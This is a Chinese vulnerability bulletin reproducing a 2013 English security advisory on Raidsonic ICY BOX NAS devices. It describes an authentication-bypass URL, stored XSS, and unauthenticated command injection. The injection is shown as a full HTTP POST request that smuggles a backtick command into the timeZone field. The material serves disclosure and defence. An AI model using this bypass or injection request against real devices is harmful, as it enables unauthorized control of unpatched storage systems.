RaidSonic IB-NAS5220、IB-NAS4220-B为网络存储设备。

 

RaidSonic IB-NAS5220、IB-NAS4220-B没有正确过滤/cgi/time/timeHandler.cgi 脚本内的 \'ping_size\'参数值，存在安全漏洞，成功利用后可使远程攻击者执行任意命令。

 

BUGTRAQ-ID:57958

受影响系统：

Raidsonic ICY BOX NAS-4220-B 2.6.3.IB.1.RS.1

Raidsonic ICY BOX NAS-5220 2.6.3-20100206S

 

测试方法：

警  告！以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！Device Name: IB-NAS5220 / IB-NAS4220-B

Vendor: Raidsonic

 

============ Vulnerable Firmware Releases: ============

 

Product Name IB-NAS5220 / IB-NAS4220-B

Tested Firmware IB5220: 2.6.3-20100206S

Tested Firmware IB4220: 2.6.3.IB.1.RS.1

 

Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip

 

============ Vulnerability Overview: ============

 

    * Authentication Bypass:

 

-> Access the following URL to bypass the login procedure:

http://<IP>/nav.cgi?foldName=adm&localePreference=en

 

    * Stored XSS:

 

System -> Time Settings -> NTP Server -> User Define

 

Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.

 

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png

 

    * Unauthenticated OS Command Injection

 

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.

 

Example Exploit:

POST /cgi/time/timeHandler.cgi HTTP/1.1

Host: 192.168.178.41

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://192.168.178.41/cgi/time/time.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 186

 

month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0

 

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png

 

============ Solution ============

 

No known solution available.

 

============ Credits ============

 

The vulnerability was discovered by Michael Messner

Mail: devnull#at#s3cur1ty#dot#de

Web: http://www.s3cur1ty.de

Advisory URL: http://www.s3cur1ty.de/m1adv2013-010

Twitter: @s3cur1ty_de

 

============ Time Line: ============

 

August 2012 - discovered vulnerability

27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B

28.08.2012 - vendor responded that they will not publish an update

15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220

15.10.2012 - vendor responded that they will not publish an update

12.02.2013 - public release

===================== Advisory end =====================

解决办法：暂无

厂商补丁：

 

Raidsonic

---------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

 

http://www.raidsonic.de/en/service.php

http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip

参考信息：

http://www.osvdb.org/90221

http://secunia.com/advisories/52216/